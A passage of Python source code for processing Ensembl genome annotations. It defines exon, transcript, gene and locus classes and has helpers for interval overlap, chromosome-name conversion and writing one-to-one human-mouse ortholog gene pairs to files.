exonDic:\n\t\toutfile.write(exonDic[e].get_summary_string()+\"\\n\")\n\t\t#print exonDic[e].get_summary_string()\n\t#\n\toutfile.close()\n\n\treturn\n\ndef overlapping_combined( orig_data, reverse = False):\n \"\"\"\n Return list of intervals with overlapping neighbours merged together\n Assumes sorted intervals unless reverse is set\n\n \"\"\"\n if not orig_data or not len(orig_data): return []\n if len(orig_data) == 1:\n return orig_data\n\n new_data = []\n\n if reverse:\n data = orig_data[:]\n data.reverse()\n else:\n data = orig_data\n\n if not data[0][0] <= data[1][0]:\n print((data, reverse))\n assert(data[0][0] <= data[1][0])\n\n # start with the first interval\n prev_beg, prev_end = data[0]\n\n # check if any subsequent intervals overlap\n for beg, end in data[1:]:\n if beg - prev_end + 1 > 0:\n new_data.append((prev_beg, prev_end))\n prev_beg = beg\n prev_end = max(end, prev_end)\n\n new_data.append((prev_beg, prev_end))\n\n if reverse:\n new_data.reverse()\n return new_data\n\n\ndef get_overlap_between_intervals(a, b):\n\t\"\"\"\n\tFinds the overlap between two intervals end points inclusive.\n\t#Makes sure not to report overlap beyond either interval length.\n\t#\ta=[10,20]; b=[10,20] --> f(a,b)=10 !(not 11)\n\t#\ta=[10,20]; b=[20,30] --> f(a,b)=1\n\t\ta=[10,20]; b=[15,30] --> f(a,b)=6\n\t\"\"\"\n\t#lena=abs(float(a[1])-float(a[0]))\n\t#lenb=abs(float(b[1])-float(b[0]))\n\toverlap=max(0, min(float(a[1]), float(b[1])) - max(float(a[0]), float(b[0]))+1)\n\t#minlen=min(lena,lenb)\n\t#return min(minlen,overlap)\n\treturn overlap\n\ndef sort_by_column(somelist, n):\n\t\"\"\"\n\tGiven a list with 1 or more columns this functions sorts it according \n\tto the desired column n [0 len(list)). Does this in-place.\n\t\"\"\"\n\tsomelist[:] = [(x[n], x) for x in somelist]\n\tsomelist.sort()\n\tsomelist[:] = [val for (key, val) in somelist]\n\treturn\n\ndef chr_name_conversion(chrIn,org):\n\t\"\"\"\n\tGiven an identifier for the chromosome name (str) or a chromosome number (int) \n\tand an organism this function converts the identifier to the other representation. \n\tExample: \n\t\tconverts 'chrX' or 'X' to 23 for human\n\t\tconverts 23 to 'chrX' 1 to 'chr1' for human\n\t\"\"\"\n\tif isinstance(chrIn, int): # int to str\n\t\tif org=='human':\n\t\t\tif\tchrIn<23 and chrIn>0:\n\t\t\t\tchrOut='chr'+str(chrIn)\n\t\t\telif chrIn==23:\n\t\t\t\tchrOut='chrX'\n\t\t\telif chrIn==24:\n\t\t\t\tchrOut='chrY'\n\t\t\telse:\n\t\t\t\treturn 'problem'\n\t\telif org=='mouse':\n\t\t\tif\tchrIn<20 and chrIn>0:\n\t\t\t\tchrOut='chr'+str(chrIn)\n\t\t\telif chrIn==20:\n\t\t\t\tchrOut='chrX'\n\t\t\telif chrIn==21:\n\t\t\t\tchrOut='chrY'\n\t\t\telse:\n\t\t\t\treturn 'problem'\n\t\telse:\n\t\t\tchrOut='chr'+str(chrIn)\n\telse: # str to int\n\t\tif 'chr' in chrIn:\n\t\t\tchrIn=chrIn[:3] # cut the 'chr'\n\t\tif org=='human':\n\t\t\tif\tchrIn=='X':\n\t\t\t\tchrOut=23\n\t\t\telif chrIn=='Y':\n\t\t\t\tchrOut=24\n\t\t\telse:\n\t\t\t\tchrOut=int(chrIn)\n\t\telif org=='mouse':\n\t\t\tif\tchrIn=='X':\n\t\t\t\tchrOut=20\n\t\t\telif chrIn=='Y':\n\t\t\t\tchrOut=21\n\t\t\telse:\n\t\t\t\tchrOut=int(chrIn)\n\treturn chrOut\n\n\n\n################################# BEGIN ExtendedExon ##################################\n### NOT USED FOR NOW, NOT YET IMPLEMENTED ####\nclass ExtendedExon:\n\t\"\"\"\n\tThis class is a container for exons that combines input from multiple different\n\tsources/files. Below is a list of these sources:\n\t\t- Ensembl Exon: This will initiate the instance of the ExtendedExon class \n\t\t- LiftOver Files:\n\t\t- Genomedata Archive:\n\t\t- PhastCons Scores:\n\t\t- BLAT within species: \n\t\"\"\"\n\tdef __init__(self, ensemblExon):\n\t\tself.basicInfoDic= ensemblExon.basicInfoDic\n################################# END ExtendedExon ##################################\n\n\n\n################################# BEGIN EnsemblExon ##################################\nclass EnsemblExon:\n\t\"\"\"\n\tThis class is a container for Ensembl exons\n\t\"\"\"\n\tdef __init__(self, line):\n\t\t# parse the transcript line\n\t\tchr,d,elemType,start_coord,end_coord,d,strand,d,others=line.rstrip().split(\"\\t\")\n\t\tif elemType!=\"exon\":\n\t\t\tsys.exit(\"Not an exon parsed in class EnsemblExon:\\t\"+elemType)\n\t\t#\n\t\t#basic information about the exon\n\t\tself.basicInfoDic={\"chromosome\" : chr, \"start_coord\" : int(start_coord), \"end_coord\" : int(end_coord), \"strand\" : strand}\n\n\t\t# there are 13 or more items for exons. We keep only 7 relevant ones.\n\t\t# e.g: gene_id \"ENSG00000167468\"; gene_version \"14\"; \n\t\t#\ttranscript_id \"ENST00000593032\"; transcript_version \"3\"; exon_number \"2\"; \n\t\t#\tgene_name \"GPX4\"; gene_source \"ensembl_havana\"; gene_biotype \"protein_coding\"; \n\t\t#\ttranscript_name \"GPX4-006\"; transcript_source \"havana\"; transcript_biotype \"protein_coding\"; \n\t\t#\texon_id \"ENSE00003420595\"; exon_version \"1\"; tag \"seleno\"; tag \"cds_end_NF\"; \n\t\titems=others.replace('\"', '').split(\";\")\n\t\tfor item in items:\n\t\t\twds=item.lstrip().split()\n\t\t\tif len(wds)>1:\n\t\t\t\tkey, val = wds[0],wds[1]\n\t\t\t\tif key in [\"gene_id\", \"gene_name\", \"transcript_id\", \"transcript_name\", \"transcript_biotype\", \"exon_id\", \"exon_number\"]:\n\t\t\t\t\tself.basicInfoDic[key]=val\n\t\t#\n\n\t\tself.exon_type = \"nonCoding\" # by default\n\t\tself.codingExon = [-1,-1] # the coordinates of below codingExon will change if partialCoding or coding\n\t\tself.transcriptIds=[self.basicInfoDic[\"transcript_id\"]]\n\t\tself.exonNumbers=[int(self.basicInfoDic[\"exon_number\"])]\n\t\tself.acceptor2bp=\"NN\"\n\t\tself.donor2bp=\"NN\"\n\t\tself.phastConsScores=[]\n\t\tself.avgConsScore=0\n\t\tself.avgCodingConsScore=0\n\t\tself.firstMidLast=[0,0,0] # appearences of this exon as first, mid and last exons. Single exons are counted as first and last.\n\t#\n\n\tdef handle_CDS(self,newLocus):\n\t\tlastSt, lastEn=self.basicInfoDic[\"start_coord\"], self.basicInfoDic[\"end_coord\"]\n\t\tnewSt, newEn= newLocus.basicInfoDic[\"start_coord\"], newLocus.basicInfoDic[\"end_coord\"]\t\n\t\tif lastSt==newSt and lastEn==newEn:\n\t\t\tself.exon_type=\"fullCoding\"\n\t\telif get_overlap_between_intervals([lastSt,lastEn], [newSt,newEn])>0:\n\t\t\tself.exon_type=\"partCoding\"\n\t\telse:\n\t\t\tsys.exit(\"Reached a CDS entry that doesn't overlap with previous exon\\t\"\\\n\t\t\t\t+newLocus.get_summary_string()+\"\\n\") \n\t\t#\n\t\tself.codingExon=[newSt,newEn]\n\t#\n\tdef add_another_instance(self,newExon):\n\t\t# an exon may appear in only one gene but for many different transcripts\n\t\tself.transcriptIds.append(newExon.basicInfoDic[\"transcript_id\"])\n\t\tself.exonNumbers.append(int(newExon.basicInfoDic[\"exon_number\"]))\n\t#\n\t# data containers within this class\n\t__slots__ = [\"basicInfoDic\", \"exon_type\", \"codingExon\", \"transcriptIds\", \"exonNumbers\", \\\n\t\t\t\"acceptor2bp\", \"donor2bp\", \"phastConsScores\", \"avgCodingConsScore\", \"avgConsScore\", \"firstMidLast\"]\n\n\t# get one liner summary of the given instance\n\tdef get_summary_string(self):\n\t\tsummary=\"chr\"+self.basicInfoDic[\"chromosome\"]+\"\\t\"+str(self.basicInfoDic[\"start_coord\"])+\"\\t\"+\\\n\t\t\tstr(self.basicInfoDic[\"end_coord\"])+\"\\t\"+self.basicInfoDic[\"strand\"]+\"\\t\"+self.basicInfoDic[\"exon_id\"]+\"\\t\"+\\\n\t\t\tself.exon_type +\"\\t\"+str(self.codingExon[0])+\"\\t\"+str(self.codingExon[1])+\"\\t\"+\\\n\t\t\t\",\".join(self.transcriptIds)+\"\\t\"+\",\".join([str(e) for e in self.exonNumbers])+\"\\t\"+\\\n\t\t\tself.basicInfoDic[\"gene_id\"]+\"\\t\"+str(abs(self.basicInfoDic[\"end_coord\"]-self.basicInfoDic[\"start_coord\"]))+\"\\t\"+\\\n\t\t\tself.acceptor2bp+\"\\t\"+self.donor2bp+\"\\t\"+str(self.avgCodingConsScore)+\"\\t\"+str(self.avgConsScore)+\"\\t\"+\\\n\t\t\t\",\".join([str(e) for e in self.firstMidLast])+\"\\texon\"\n\t\t\t#self.basicInfoDic[\"transcript_id\"]+\"\\t\"+self.basicInfoDic[\"exon_number\"]+\"\\t\"+\\\n\t\treturn summary\n################################# END EnsemblExon ##################################\n\n################################# BEGIN EnsemblLocus ##################################\nclass EnsemblLocus:\n\t\"\"\"\n\tThis class is a container for a basic locus that has chr, start, end, strand \n\tfields. UTRs, start and stop codons from Ensembl are of this type.\n\t\"\"\"\n\tdef __init__(self, line):\n\t\t# parse the locus line\n\t\tchr,d,elemType,start_coord,end_coord,d,strand,d,others=line.rstrip().split(\"\\t\")\n\t\tif elemType!=\"UTR\" and elemType!=\"stop_codon\" and elemType!=\"start_codon\" and elemType!=\"CDS\":\n\t\t\tsys.exit(\"Not a basic locus as intended parsed in from Ensemble line:\\t\"+line)\n\t\t#\n\t\t#basic information about the locus\n\t\tself.basicInfoDic={\"chromosome\" : chr, \"start_coord\" : int(start_coord), \\\n\t\t\t\"end_coord\" : int(end_coord), \"strand\" : strand, \"locus_type\" : elemType}\n\n\t\titems=others.replace('\"', '').split(\";\")\n\t\tfor item in items:\n\t\t\twds=item.lstrip().split()\n\t\t\tif len(wds)>1:\n\t\t\t\tkey, val = wds[0],wds[1]\n\t\t\t\tif key in [\"gene_id\", \"gene_name\", \"transcript_id\", \"transcript_name\", \"transcript_biotype\", \"protein_id\"]:\n\t\t\t\t\tself.basicInfoDic[key]=val\n\t\t#\n\n\n\t\t#\n\n\t__slots__ = [\"basicInfoDic\"]\n\n\t# get one liner summary of the given instance\n\tdef get_summary_string(self):\n\t\tsummary=\"chr\"+self.basicInfoDic[\"chromosome\"]+\"\\t\"+str(self.basicInfoDic[\"start_coord\"])+\"\\t\"+\\\n\t\t\tstr(self.basicInfoDic[\"end_coord\"])+\"\\t\"+self.basicInfoDic[\"strand\"]+\"\\t\"+self.basicInfoDic[\"locus_type\"]+\"\\t\"+\\\n\t\t\tself.basicInfoDic[\"transcript_id\"]+\"\\t\"+self.basicInfoDic[\"transcript_name\"]+\"\\t\"+\\\n\t\t\tself.basicInfoDic[\"transcript_biotype\"]+\"\\t\"+self.basicInfoDic[\"gene_id\"]+\"\\t\"+self.basicInfoDic[\"gene_name\"]+\"\\tlocus\"\n\t\treturn summary\n################################# END EnsemblLocus ##################################\n\n\n################################# BEGIN EnsemblTranscript ##################################\nclass EnsemblTranscript:\n\t\"\"\"\n\tThis class is a container for Ensembl transcripts\n\t\"\"\"\n\tdef __init__(self, line):\n\t\t# parse the transcript line\n\t\tchr,d,elemType,start_coord,end_coord,d,strand,d,others=line.rstrip().split(\"\\t\")\n\t\tif elemType!=\"transcript\":\n\t\t\tsys.exit(\"Not a transcript parsed in class EnsemblTranscript:\\t\"+elemType)\n\t\t#\n\t\t#basic information about the transcript\t\n\t\tself.basicInfoDic={\"chromosome\" : chr, \"start_coord\" : int(start_coord), \"end_coord\" : int(end_coord), \"strand\" : strand}\n\n\t\t# there are 10 or more items for transcripts. We keep only 5 relevant ones.\n\t\t# e.g: gene_id \"ENSG00000223972\"; gene_version \"5\"; transcript_id \"ENST00000456328\"; \n\t\t#\ttranscript_version \"2\"; gene_name \"DDX11L1\"; gene_source \"havana\"; gene_biotype \"transcribed_unprocessed_pseudogene\"; \n\t\t#\ttranscript_name \"DDX11L1-002\"; transcript_source \"havana\"; transcript_biotype \"processed_transcript\";\n\t\t#\n\n\t\titems=others.replace('\"', '').split(\";\")\n\t\tfor item in items:\n\t\t\twds=item.lstrip().split()\n\t\t\tif len(wds)>1:\n\t\t\t\tkey, val = wds[0],wds[1]\n\t\t\t\t#key, val = (item.lstrip().split())[0:2]\n\t\t\t\tif key in [\"gene_id\", \"gene_name\", \"transcript_id\", \"transcript_name\", \"transcript_biotype\"]:\n\t\t\t\t\tself.basicInfoDic[key]=val\n\t\t#\n\t\tif \"gene_name\" not in self.basicInfoDic: \n\t\t\tself.basicInfoDic[\"gene_name\"]=self.basicInfoDic[\"gene_id\"]\n\t\tif \"transcript_name\" not in self.basicInfoDic: \n\t\t\tself.basicInfoDic[\"transcript_name\"]=self.basicInfoDic[\"transcript_id\"]\n\n\t\tself.start_codon=[\"cds_start_NF\"] # by default make them non-confirmed\n\t\tself.stop_codon=[\"cds_stop_NF\"] # by default make them non-confirmed\n\t\tself.exons = []\n\t\tself.codingExons = []\n\t\tself.exon_types= []\n\t\tself.protein_id=\"None\"\n\t\tself.UTRs=[]\n\t#\n\n\t# adding an exon to the list of exons of the transcript \"in order\"\n\tdef add_exon(self,newExon):\n\t\texonCountSoFar=len(self.exons)\n\t\t#print \"to add\\t\"+str(newExon.basicInfoDic[\"exon_number\"])+\"\\t\"+str(newExon.basicInfoDic[\"exon_id\"])\n\t\tif int(newExon.basicInfoDic[\"exon_number\"])==exonCountSoFar+1:\n\t\t\texonEntry=[newExon.basicInfoDic[\"start_coord\"],newExon.basicInfoDic[\"end_coord\"],\n\t\t\t\tnewExon.basicInfoDic[\"exon_id\"]]\n\t\t\tself.exons.append(exonEntry)\n \t\t\t# the coordinates of below codingExon will change if partialCoding or coding\n\t\t\tself.codingExons.append([-1,-1])\n\t\t\texonType=\"nonCoding\" # by default\n\t\t\tself.exon_types.append(exonType)\n\t\telse:\n\t\t\tsys.exit(\"Exon entry is being entered out of order to the transcript\\t\"\n\t\t\t\t+self.basicInfoDic[\"transcript_id\"])\n\t\t#\n\t#\n\tdef add_locus(self,newLocus,locus_type):\n\t\tif locus_type=='start_codon':\n\t\t\tself.start_codon=[newLocus.basicInfoDic[\"start_coord\"],newLocus.basicInfoDic[\"end_coord\"]]\n\t\telif locus_type=='stop_codon':\n\t\t\tself.stop_codon=[newLocus.basicInfoDic[\"start_coord\"],newLocus.basicInfoDic[\"end_coord\"]]\n\t\telif locus_type=='UTR':\n\t\t\tself.UTRs.append([newLocus.basicInfoDic[\"start_coord\"],newLocus.basicInfoDic[\"end_coord\"]])\n\t\telse:\n\t\t\tsys.exit(\"Unknow locus type being inserted to transcript\\t\"\\\n\t\t\t\t+self.basicInfoDic[\"transcript_id\"]) \n\t#\n\n\tdef handle_CDS(self,newLocus):\n\t\texonType=\"nonCoding\" # by default\n\t\texonCountSoFar=len(self.exons)\n\t\tlastAddedExon=self.exons[exonCountSoFar-1]\n\t\tlastSt,lastEn=self.exons[exonCountSoFar-1][0:2]\n\t\tnewSt, newEn= newLocus.basicInfoDic[\"start_coord\"], newLocus.basicInfoDic[\"end_coord\"]\t\t\n\t\tif lastSt==newSt and lastEn==newEn:\n\t\t\texonType=\"fullCoding\"\n\t\telif get_overlap_between_intervals([lastSt,lastEn], [newSt,newEn])>0:\n\t\t\texonType=\"partCoding\"\n\t\telse:\n\t\t\tsys.exit(\"Reached a CDS entry that doesn't overlap with previous exon\\t\"\\\n\t\t\t\t+newLocus.get_summary_string()+\"\\n\")\n\t\t#\n\t\tself.codingExons[exonCountSoFar-1]=[newSt,newEn]\n\t\tself.exon_types[exonCountSoFar-1]=exonType # replace with the previous nonCoding tag\n\t\tself.protein_id=newLocus.basicInfoDic[\"protein_id\"]\n\t#\n\n\t# data containers within this class\n\t__slots__ = [\n\t\t\t\"basicInfoDic\", \n\t\t\t\"start_codon\",\n\t\t\t\"stop_codon\",\n\t\t\t\"exons\",\n\t\t\t\"codingExons\",\n\t\t\t\"exon_types\",\n\t\t\t\"protein_id\",\n\t\t\t\"UTRs\"\n\t]\n\t# get one liner summary of the given instance\n\tdef get_summary_string(self):\n\t\tif len(self.UTRs)==0:\n\t\t\tself.UTRs.append([\"None\",\"None\"])\n\t\t#\n\t\tsummary=\"chr\"+self.basicInfoDic[\"chromosome\"]+\"\\t\"+str(self.basicInfoDic[\"start_coord\"])+\"\\t\"+\\\n\t\t\tstr(self.basicInfoDic[\"end_coord\"])+\"\\t\"+self.basicInfoDic[\"strand\"]+\"\\t\"+self.basicInfoDic[\"transcript_id\"]+\"\\t\"+\\\n\t\t\tself.basicInfoDic[\"transcript_name\"]+\"\\t\"+self.basicInfoDic[\"transcript_biotype\"]+\"\\t\"+\\\n\t\t\tself.basicInfoDic[\"gene_id\"]+\"\\t\"+self.basicInfoDic[\"gene_name\"]+\"\\t\"+\\\n\t\t\t\",\".join([e[2] for e in self.exons])+\"\\t\"+\",\".join(self.exon_types)+\"\\t\"+\\\n\t\t\t\",\".join([str(e[0]) for e in self.exons])+\"\\t\"+\",\".join([str(e[1]) for e in self.exons])+\"\\t\"+\\\n\t\t\t\",\".join([str(e[0]) for e in self.codingExons])+\"\\t\"+\",\".join([str(e[1]) for e in self.codingExons])+\"\\t\"+\\\n\t\t\t\",\".join([str(i) for i in self.start_codon])+\"\\t\"+\",\".join([str(i) for i in self.stop_codon])+\"\\t\"+\\\n\t\t\t\",\".join([str(e[0]) for e in self.UTRs])+\"\\t\"+\",\".join([str(e[1]) for e in self.UTRs])+\"\\t\"+\\\n\t\t\tself.protein_id+\"\\t\"+\"transcript\"\n\t\treturn summary\n################################# END EnsemblTranscript ##################################\n\n\n\t\t\t\n################################# BEGIN EnsemblGene ##################################\nclass EnsemblGene:\n\t\"\"\"\n\tThis class is a container for Ensembl genes.\n\t\"\"\"\n\tdef __init__(self, line):\n\t\t# parse the gene line\n\t\tchr,d,elemType,start_coord,end_coord,d,strand,d,others=line.rstrip().split(\"\\t\")\n\t\tif elemType!=\"gene\":\n\t\t\tsys.exit(\"Not a gene parsed in class EnsemblGene:\\t\"+elemType)\n\t\t#\n\t\t#basic information about the gene\t\n\t\tself.basicInfoDic={\"chromosome\" : chr, \"start_coord\" : int(start_coord), \"end_coord\" : int(end_coord), \"strand\" : strand}\n\n\t\t# there are 5 items for genes: \n\t\t# e.g: gene_id \"ENSG00000223972\"; gene_version \"5\"; gene_name \"DDX11L1\"; gene_source \"havana\"; gene_biotype \"transcribed\";\n\t\titems=others.replace('\"', '').split(\";\")\n\t\tfor item in items:\n\t\t\tif len(item)>1:\n\t\t\t\tkey, val = item.lstrip().split()\n\t\t\t\tself.basicInfoDic[key]=val\n\t\tif \"gene_name\" not in self.basicInfoDic: \n\t\t\tself.basicInfoDic[\"gene_name\"]=self.basicInfoDic[\"gene_id\"]\n\t\tself.exons = {}\n\t\tself.transcripts = {}\n\t#\n\n\t# data containers within this class\n\t__slots__ = [\n\t\t\t\"basicInfoDic\", \n\t\t\t\"exons\",\n\t\t\t\"transcripts\"]\n\n\t# adding a transcript to the gene\n\tdef add_transcript(self,newTranscript):\n\t\tself.transcripts[newTranscript.basicInfoDic[\"transcript_id\"]]=newTranscript\n\t# adding an exon to the list of exons of the gene\n\tdef add_exon(self,newExon):\n\t\tself.exons[newExon.basicInfoDic[\"exon_id\"]]=\\\n\t\t\t[newExon.basicInfoDic[\"start_coord\"],newExon.basicInfoDic[\"end_coord\"]]\n\t# get one liner summary of the given instance\n\tdef get_summary_string(self):\n\t\tsummary=\"chr\"+self.basicInfoDic[\"chromosome\"]+\"\\t\"+str(self.basicInfoDic[\"start_coord\"])+\"\\t\"+\\\n\t\t\tstr(self.basicInfoDic[\"end_coord\"])+\"\\t\"+self.basicInfoDic[\"strand\"]+\"\\t\"+self.basicInfoDic[\"gene_id\"]+\"\\t\"+\\\n\t\t\tself.basicInfoDic[\"gene_name\"]+\"\\t\"+self.basicInfoDic[\"gene_biotype\"]+\"\\t\"+\\\n\t\t\tstr(len(self.transcripts))+\"\\t\"+str(len(self.exons))+\"\\tgene\"\n\t\treturn summary\n\t#\n\t#def gene_wrap_up():\n\t#\tself.beg = min(self.exons[e][0] for e in self.exons)\n\t#\tself.end = max(self.exons[e][1] for e in self.exons)\n\t#\n\n################################# END EnsemblGene ##################################\n\n\ndef convert_UCSC_to_bed_format(l):\n\t\"\"\"\n\tGiven a locus in UCSC format this function converts it to bed format with 3 fields\n\tchr1:121-21111 --> ['chr1', 121, 21111]\n\t\"\"\"\n\tchr=l[:l.find(':')]\n\tst=int(l[l.find(':')+1:l.find('-')])\n\ten=int(l[l.find('-')+1:])\n\treturn (chr,st,en)\n\n\ndef consistency_check(org1TOorg2,org2TOorg1):\n\t\"\"\"\n\tCheck the consistency between the two matchings (e.g. human-to-mouse, mouse-to-human)\n\tread from separate Ensembl file. This function will do nothing if all is consistent.\n\t\"\"\"\n\tfor g1 in org1TOorg2:\n\t\ttype=org1TOorg2[g1][0][1]\n\t\tif type==\"ortholog_one2one\":\n\t\t\tg2=org1TOorg2[g1][0][0]\n\t\t\tif g2 not in org2TOorg1:\n\t\t\t\tsys.exit(\"Reverse entry for a one2one match couldn't be found\\t\"+g1+\"\\t\"+g2)\n\t\t\telif org2TOorg1[g2][0][0]!=g1:\n\t\t\t\tsys.exit(\"Reverse entry for a one2one match mismatches with original one\\t\"+g1+\"\\t\"+g2)\n\t\t\t# else good\n\t\telse:\n\t\t\tfor oneMatch1 in org1TOorg2[g1]:\n\t\t\t\tg2=oneMatch1[0]\n\t\t\t\tif g2 not in org2TOorg1:\n\t\t\t\t\tsys.exit(\"Reverse entry for a NON-one2one match couldn't be found\\t\"+g1+\"\\t\"+g2)\n\t\t\t\telse:\n\t\t\t\t\treverseFound=False\n\t\t\t\t\tfor oneMatch2 in org2TOorg1[g2]:\n\t\t\t\t\t\tif oneMatch2[0]==g1:\n\t\t\t\t\t\t\treverseFound=True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t#\n\t\t\t\t\tif reverseFound==False:\n\t\t\t\t\t\tsys.exit(\"Reverse entry for a NON-one2one match mismatches with original one\\t\"+g1+\"\\t\"+g2)\n\t\t\t\t\t# else good\n\t\t\t\t#\n\t#\n\tfor g1 in org2TOorg1:\n\t\ttype=org2TOorg1[g1][0][1]\n\t\tif type==\"ortholog_one2one\":\n\t\t\tg2=org2TOorg1[g1][0][0]\n\t\t\tif g2 not in org1TOorg2:\n\t\t\t\tsys.exit(\"Reverse entry for a one2one match couldn't be found\\t\"+g1+\"\\t\"+g2)\n\t\t\telif org1TOorg2[g2][0][0]!=g1:\n\t\t\t\tsys.exit(\"Reverse entry for a one2one match mismatches with original one\\t\"+g1+\"\\t\"+g2)\n\t\t\t# else good\n\t\telse:\n\t\t\tfor oneMatch1 in org2TOorg1[g1]:\n\t\t\t\tg2=oneMatch1[0]\n\t\t\t\tif g2 not in org1TOorg2:\n\t\t\t\t\tsys.exit(\"Reverse entry for a NON-one2one match couldn't be found\\t\"+g1+\"\\t\"+g2)\n\t\t\t\telse:\n\t\t\t\t\treverseFound=False\n\t\t\t\t\tfor oneMatch2 in org1TOorg2[g2]:\n\t\t\t\t\t\tif oneMatch2[0]==g1:\n\t\t\t\t\t\t\treverseFound=True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t#\n\t\t\t\t\tif reverseFound==False:\n\t\t\t\t\t\tsys.exit(\"Reverse entry for a NON-one2one match mismatches with original one\\t\"+g1+\"\\t\"+g2)\n\t\t\t\t\t# else good\n\t\t\t\t#\n\t#\n\treturn\n\n\ndef pickle_one2one_genePairs_allInfo(genePairsDic,geneDic1,geneDic2,exonDic1,exonDic2,transcriptDic1,transcriptDic2,outdir):\n\t\"\"\"\n\tPickle the gene, transcript and exon dictionaries for each pair of ortholog_one2one genes.\n\tThere are around 16.5k such genes for human-mouse and 15.8k are protein_coding pairs.\n\t\"\"\"\n\tgeneOnlyOrthoDic1,transcriptOnlyOrthoDic1,exonOnlyOrthoDic1={},{},{}\n\tgeneOnlyOrthoDic2,transcriptOnlyOrthoDic2,exonOnlyOrthoDic2={},{},{}\n\n\tfor g1 in genePairsDic:\n\t\ttype=genePairsDic[g1][0][1]\n\t\tif type==\"ortholog_one2one\":\n\t\t\tg2=genePairsDic[g1][0][0]\n\t\telse:\n\t\t\tcontinue\n\n\t\tif geneDic1[g1].basicInfoDic[\"gene_biotype\"]!=\"protein_coding\" or geneDic2[g2].basicInfoDic[\"gene_biotype\"]!=\"protein_coding\":\n\t\t\tcontinue\n\n\t\t# small dictionaries that have only the relevant stuff for one gene pair\n\t\tnewGeneDic1={}; newGeneDic2={}\n\t\tnewExonDic1={}; newExonDic2={}\n\t\tnewTranscriptDic1={}; newTranscriptDic2={}\n\t\t#\n\t\tnewGeneDic1[g1]=geneDic1[g1]\n\t\tnewGeneDic2[g2]=geneDic2[g2]\n\t\tgeneOnlyOrthoDic1[g1]=geneDic1[g1]\n\t\tgeneOnlyOrthoDic2[g2]=geneDic2[g2]\n\t\tfor tId in geneDic1[g1].transcripts:\n\t\t\tnewTranscriptDic1[tId]=transcriptDic1[tId]\n\t\t\ttranscriptOnlyOrthoDic1[tId]=transcriptDic1[tId]\n\t\tfor tId in geneDic2[g2].transcripts:\n\t\t\tnewTranscriptDic2[tId]=transcriptDic2[tId]\n\t\t\ttranscriptOnlyOrthoDic2[tId]=transcriptDic2[tId]\n\t\t#\n\t\tfor eId in geneDic1[g1].exons:\n\t\t\tnewExonDic1[eId]=exonDic1[eId]\n\t\t\texonOnlyOrthoDic1[eId]=exonDic1[eId]\n\t\tfor eId in geneDic2[g2].exons:\n\t\t\tnewExonDic2[eId]=exonDic2[eId]\n\t\t\texonOnlyOrthoDic2[eId]=exonDic2[eId]\n\t\t#\n\t\tos.system(\"mkdir -p \"+ outdir+\"/\"+g1+\"-\"+g2)\n\t\t#print geneDic1[g1].get_summary_string()+\"\\t\"+geneDic2[g2].get_summary_string()\n\t\toutfilename=outdir+\"/\"+g1+\"-\"+g2+\"/org1.pickledDictionaries\"\n\t\tpickle.dump((newGeneDic1,newTranscriptDic1,newExonDic1), open(outfilename,\"wb\"))\n\t\toutfilename=outdir+\"/\"+g1+\"-\"+g2+\"/org2.pickledDictionaries\"\n\t\tpickle.dump((newGeneDic2,newTranscriptDic2,newExonDic2), open(outfilename,\"wb\"))\n\t\t# to load use:\n\t\t#geneDic1,transcriptDic1,exonDic1=pickle.load(open(\"pickled.stuff\",\"rb\"))\n\t#\n\t\n\treturn (geneOnlyOrthoDic1,transcriptOnlyOrthoDic1,exonOnlyOrthoDic1, geneOnlyOrthoDic2,transcriptOnlyOrthoDic2,exonOnlyOrthoDic2)\n\ndef print_one2one_genePairs(genePairsDic, geneDic1,geneDic2,outfilename):\n\t\"\"\"\n\tPrint one liner for each pair of genes that match each other one to one.\n\tThere are around 16.5k such genes for human-mouse and 15.8k are protein_coding pairs.\n\t\"\"\"\n\toutfile=open(outfilename,'w')\n\toutfile.write(\"chrName1\\tstart_coord1\\tend_coord1\\tstrand1\\tgeneID1\\tgeneName1\\tgeneType1\\tnoOfTranscripts1\\tnoOfExons1\\ttype1\\t\")\n\toutfile.write(\"chrName2\\tstart_coord2\\tend_coord2\\tstrand2\\tgeneID2\\tgeneName2\\tgeneType2\\tnoOfTranscripts2\\tnoOfExons2\\ttype2\\n\")\n\t#print \"chrName1\\tstart_coord1\\tend_coord1\\tstrand1\\tgeneID1\\tgeneName1\\tgeneType1\\tnoOfTranscripts1\\tnoOfExons1\\ttype1\\t\",\n\t#print \"chrName2\\tstart_coord2\\tend_coord2\\tstrand2\\tgeneID2\\tgeneName2\\tgeneType2\\tnoOfTranscripts2\\tnoOfExons2\\ttype2\"\n\tfor g1 in genePairsDic:\n\t\ttype=genePairsDic[g1][0][1]\n\t\tif type==\"ortholog_one2one\":\n\t\t\tg2=genePairsDic[g1][0][0]\n\t\telse:\n\t\t\tcontinue\n\t\toutfile.write(geneDic1[g1].get_summary_string()+\"\\t\"+geneDic2[g2].get_summary_string()+\"\\n\")\n\t\t#print geneDic1[g1].get_summary_string()+\"\\t\"+geneDic2[g2].get_summary_string()\n\t#\n\toutfile.close()\n\treturn\n\ndef print_one2one_transcriptListPairs(genePairsDic, geneDic1,geneDic2,transcriptDic1,transcriptDic2,orgId1,orgId2,outdir):\n\t\"\"\"\n\tPrint the lists of transcripts for each one to one mapped gene pair. \n\tThere are around 16.5k such genes for human-mouse and 15.8k are protein_coding pairs.\n\t\"\"\"\n\tfor g1 in genePairsDic:\n\t\ttype=genePairsDic[g1][0][1]\n\t\tif type==\"ortholog_one2one\":\n\t\t\tg2=genePairsDic[g1][0][0]\n\t\telse:\n\t\t\tcontinue\n\t\t#\n\t\toutdirTemp=outdir+\"/\"+g1+\"-\"+g2; os.system(\"mkdir -p \"+outdirTemp)\n\t\toutfile1=open(outdirTemp+\"/\"+orgId1+\"_transcripts.bed\",'w')\n\t\toutfile2=open(outdirTemp+\"/\"+orgId2+\"_transcripts.bed\",'w')\n\t\t\n\t\ttranscripts1=geneDic1[g1].transcripts\n\t\ttranscripts2=geneDic2[g2].transcripts\n\t\tfor t1 in transcripts1:\n\t\t\toutfile1.write(transcriptDic1[t1].get_summary_string()+\"\\n\")\n\t\tfor t2 in transcripts2:\n\t\t\toutfile2.write(transcriptDic2[t2].get_summary_string()+\"\\n\")\n\t\t#\n\t\toutfile1.close()\n\t\toutfile2.close()\n\t#\n\treturn\n\ndef print_one2one_exonListPairs(genePairsDic, geneDic1,geneDic2,exonDic1,exonDic2,orgId1,orgId2,outdir):\n\t\"\"\"\n\tPrint the lists of exons for each one to one mapped gene pair. \n\tThere are around 16.5k such genes for human-mouse and 15.8k are protein_coding 